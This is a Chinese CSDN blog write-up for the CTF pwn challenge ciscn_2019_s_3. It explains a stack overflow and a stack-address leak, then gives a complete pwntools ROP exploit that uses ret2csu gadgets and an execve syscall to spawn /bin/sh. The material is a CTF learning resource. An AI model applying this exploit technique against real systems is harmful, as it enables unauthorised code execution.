pwn ciscn_2019_s_3

最新推荐文章于 2024-01-27 21:36:30 发布
最新推荐文章于 2024-01-27 21:36:30 发布
阅读量191 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beaster1/article/details/115092963
版权

pwn ciscn_2019_s_3

checksec一下发现是64位文件
并只开了NX保护
打开IDA 进入main函数直接转到vuln(可以看到明显栈溢出var_10距离rpb 0x10)

在这里插入图片描述
发现有两个系统调用号,系统调用号的传参方式是先将调用号传入rax,然后参数依次从左至右传入rdi,rsi,rdx寄存器中,最后返回值存入rax
看到最后有点奇怪开始时pop rbp mov rbp,rsp
程序结束的时候直接是:retn(pop rip) 这里直接就跳出vuln函数了
所以rbp始终都是等于rsp 所以vuln函数结束后可以直接给ebp覆盖到想要的地址
在ida中还有gadgets函数其中还有两个系统调用
mov rax, 3Bh ret可以用来调用execve(‘/bin/sh’,0,0)后面有两个参数0

在这里插入图片描述

接下来可以构造payload
首先写入/bin/sh使栈溢出然后覆盖rbp转到vuln函数
payload=’/bin/sh\x00’*2+p64(vuln) 然后write往栈上写入0x30
先接收0x20
接下来会接收8个单元的栈地址要减去栈的原地址
然后接着第二次payload先使栈溢出然后使rax为3B(59)因为r13的值会给到rdx,让rbx=0,下面call的时候会变为call [r12],会去call r12指向位置的代码 在进行传参 然后再转到mov rdx r13 接这要进行栈平衡最后就可以pop rdi 传sys的参数binsh调用sys函数


from pwn import *
from LibcSearcher import *

#p=remote('node3.buuoj.cn',25468)
p=process('ciscn_s_3')
elf=ELF('ciscn_s_3')

vuln=0x4004ED
pop_rbx=0x40059a
mov_rdx_r13=0x400580
ret=0x4003A9
rax_59_ret=0x04004E2
syscall=0x400517
pop_rdi=0x04005a3

payload='/bin/sh\x00'*2+p64(vuln)
p.sendline(payload)
p.recv(0x20)
stack=u64(p.recv(8))

binsh=stack-0x118

payload='/bin/sh\x00'*2+p64(rax_59_ret)+p64(pop_rbx)+p64(0)#使rbx为0使后面可以call r12
payload+=p64(1)+p64(binsh+0x10)+p64(0)+p64(0)+p64(123123123)
payload+=p64(mov_rdx_r13)+'a'*0x38#栈平衡
payload+=p64(pop_rdi)
payload+=p64(binsh)
payload+=p64(syscall)


p.sendline(payload)

p.interactive()
zeeeroo
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf【ciscn_2019_s_3】
HUANGliang_的博客
10-29 461
ciscn_2019_s_3
ciscn_2019_s_3
m0_48127441的博客
04-07 163
pwn题目主要是为了获得flag文件 一般使用 syscall(exec) 获得shell 或者使用open + read 获得文件内容 syscall(rax= 0x3B, rdi = '/bin/sh', rsi = 0x0, rdx = 0x0) //execve 函数调用syscall system函数调用execve函数 因为封装过,调用参数有所变化,保护机制也有所区别 该题能栈溢出,但是不知道栈地址 发现正常输出(输入小于0x10的数据时),会讲rsi地...
我又pwn了 ——刷题篇 ciscn_s_3
m0_64195960的博客
08-08 447
ret2csu&SROP
PWNret2csu技巧题目ciscn_s_3
最新发布
m0_74312867的博客
01-27 881
我什么都不会/(ㄒoㄒ)/~~
ciscn_2019_s_3(execve&&sigreturn)
qq_33590156的博客
08-04 203
本题是一个系统调用,存在栈溢出,要点有以下几点,以下为第一种解法,构造execve(’/bin/sh’,0,0) 1.题目中,并未出现sub esp得字眼,所以本题中ebp一直与esp重合,即最后ret得时候,pop的其实是rbp处的地址,所以本题返回点并不在ret处,而在rbp处。 2.本题没有‘/bin/sh’,所以只能自己输入到栈上,这时就需要泄漏栈的地址,在使用gdb调试后,可以看到在ret地址后面有存储一个栈地址(即可以泄漏),再在调用syswrite时,可以看到buf的地址,经过计算后,得出偏移
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
pwnciscn_2019_s_3
Nothing
12-14 4496
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
CTF buuoj pwn-----第12题: ciscn_2019_s_3
bing_Max的博客
10-09 1464
函数分析 编写exp from pwn import * sh = remote('node4.buuoj.cn', 27939) context(arch='amd64',os='linux', log_level='debug') main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.
BUUCTF(pwn) ciscn_2019_s_3 [ 栈溢出SROP攻击]
半岛铁盒的博客
08-10 346
64位,开启了NX保护 main函数调用了vuln
【CTF】【PWNciscn_s_3题解
m0_50819561的博客
09-23 723
前置知识: 64位系统: 传参方式:首先将系统调用号 传入 rax,然后将参数从左到右依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号为0,sys_write 的调用号 为1 stub_execve 的调用号为59,stub_rt_sigreturn 的调用号为15 调用方式: 使用 syscall 进行系统调用 首先惯例checksec一下。发现NX保护开了。 用IDA打开文件之后返现main函数里面套了一个vuln函数。跟进去查看如下 tab转汇编
nmap vuln脚本扫描结果分析
heiseweiye的博客
08-30 5187
先上图,图中的是使用nmap的vuln的脚本扫描路由器的结果 首先主机已启动,可以看到对应的端口号,开放的服务以及相应的版本信息。 1、http-cookie-flags 检查HTTP服务设置的cookie。报告没有httponly标志的任何会话cookie。报告通过SSL设置而不使用安全标志的任何会话cookie。如果还运行了http-enum.nse,则除了根之外,还将检查由它找到的任何路...
VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议】
大方子
10-04 962
项目地址:https://github.com/jianmou/VulnCTF ============================ 个人收获: 1.利用PHP内置协议直接读取网页代码   ==============================     题目:   我们查看下网页源码 通过代码发现是文件包含。   我们把url改为http://local...
【CTF】【PWN】【胎教向】ciscn_2019_n_3
m0_50819561的博客
10-28 180
拖进IDA反编译。 程序有三个功能:创建NOTE,删除NOTE,print NOTE 创建NOTE的时候会先malloc一个固定大小为0xC的chunk。 然后再malloc一个大小自己设置的chunk。 不难发现,第一个申请的chunk起到控制作用,用来存放每一个NOTE都会有的功能。 两个chunk之间的关系应该如下图。我们把第一个chunk命名为control,第二个chunk命名为content。control control块有三个部分,print和free,还有ptr。ptr指向conte
xdctf2015_pwn200
09-03
common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [xdctf2015_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值